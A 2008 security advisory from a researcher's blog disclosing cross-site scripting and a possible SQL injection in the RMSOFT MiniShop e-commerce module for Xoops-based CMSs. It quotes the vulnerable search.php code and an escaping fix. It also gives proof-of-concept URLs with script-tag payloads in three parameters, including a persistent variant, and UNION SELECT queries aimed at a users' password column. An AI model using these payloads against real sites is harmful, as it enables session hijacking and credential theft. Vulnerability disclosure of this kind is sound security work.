##########################################
RMSOFT MiniShop module multiple variable XSS
Vendor url:http://redmexico.com.mx
Advisore:http://lostmon.blogspot.com/2008/08
/rmsoft-minishop-module-multiple.html
Vendor notify:no exploit available:yes
##########################################
RMSOFT MiniShop is a E-commerce php/Mysql script module
for multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.
RMSOFT MiniShop contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate multiple variable upon
submission to 'search.php' script in RMSOFT MiniShop module.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss ofintegrity.
#################
Versions
################·
RMSOFT MiniShop 1.0
it affects This type CMS Systems if we
have instaled this module:
Xoops
e-xoops
ImpressCMS
Bcoos
and other that uses xoops code and this module.
###################
Solution
###################
At this moment ,no have solution...
###################
Proof of Concept.
###################
#############
XSS
#############
vulnerable code key & idc variables in lines 35 & 36 in search.php
$key = isset($_GET['key']) ? $_GET['key'] : (isset($_POST['key']) ? $_POST['key'] : '');
$idc = isset($_GET['idc']) ? $_GET['idc'] : (isset($_POST['idc']) ? $_POST['idc'] : '');
to fix change to:
$key = isset($_GET['key']) ? htmlspecialchars($_GET['key']) : (isset($_POST['key']) ? htmlspecialchars($_POST['key']) : '');
$idc = isset($_GET['idc']) ? htmlspecialchars($_GET['idc']) : (isset($_POST['idc']) ? htmlspecialchars($_POST['idc']) : '');
vulnerable code itemsxpag variable in lines 56 to 67 in search.php :
//NUmero de resultados por página
if (isset($_GET['itemsxpag'])){
//setcookie('itemsxpag', $_GET['itemsxpag'], 86400);
$_SESSION['itemsxpag'] = $_GET['itemsxpag'];
$limit = $_GET['itemsxpag'];} else {
$limit = $_SESSION['itemsxpag'];
}if ($limit <= 0){
$limit = $xoopsModuleConfig['cols'] * 3;
$_SESSION['itemsxpag'] = $limit;}
exploit all tree variables:
http://localhost/impresscms/htdocs/modules/rmms/search.php?itemsxpag=4
"><script>alert(1)</script>&Submit=Go%21&idc=0
"><script>alert(2)</script>
&key="><script>alert(3)</script>
This is a persistent script insercion in 'itemsxpag' variable because the value
of the variable is inserted directly in '$_SESION' & '$Limit' variables.:
http://localhost/impresscms/htdocs/modules/rmms/search.php?
itemsxpag=12"><script>alert(1)</script>&Submit=Go%21&idc=
&key=lalalalalala
try to navigate to index and go again to minishop module
and try to search something in the search box of module.
Wen show the results the script executed before is
executed again.
#####################
Posible SQL Injection
#####################
wen exploit in the example of script insercion
if we look web down we have a SQL Error:
You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near '\">' at line 2
we can try to inject some SQL code like
http://localhost/impresscms/htdocs/modules/rmms/search.php?
itemsxpag=-1/**/union/**/select/**/pass/**/form/**/x21101_users
/**/LIMIT/**/1&idc=0&key=aaa
http://localhost/impresscms/htdocs/modules/rmms/search.php?
itemsxpag=28+UNION+SELECT+pass+FROM+x21101_users+LIMIT+1
&Submit=Go%21&idc=&key=aaaaaa
and we get this error Incorrect usage of UNION and ORDER BY...
we think in a classic SQL error , but i make several test with
union select and concat , etc etc and don´t have a working exploit
..them this is a unknow impact , and need to patch
############## €nd ###################
Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
skip to main |
skip to sidebar
Security Research & Analisys:
Personal Blog where I expose my investigations,
advisores and some outstanding news on security.
Categories
Archives
-
►
2022
(2)
- ► November 2022 (1)
- ► October 2022 (1)
-
►
2013
(2)
- ► December 2013 (1)
- ► August 2013 (1)
-
►
2012
(5)
- ► April 2012 (1)
-
►
2011
(5)
- ► October 2011 (1)
- ► March 2011 (1)
-
►
2010
(18)
- ► December 2010 (2)
- ► September 2010 (1)
- ► March 2010 (1)
- ► February 2010 (1)
- ► January 2010 (1)
-
►
2009
(25)
- ► November 2009 (1)
- ► April 2009 (1)
- ► March 2009 (1)
- ► February 2009 (1)
-
▼
2008
(24)
- ▼ August 2008 (9)
- ► April 2008 (1)
- ► March 2008 (1)
-
►
2007
(29)
- ► October 2007 (1)
- ► March 2007 (1)
-
►
2006
(14)
- ► August 2006 (1)
- ► February 2006 (1)
-
►
2005
(54)
- ► December 2005 (1)
- ► April 2005 (14)
Browse
About:Me
My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
La curiosidad es lo que hace
mover la mente...
Online Tools & Calculators
Posts
Lostmon Blogger © All Rights Reserved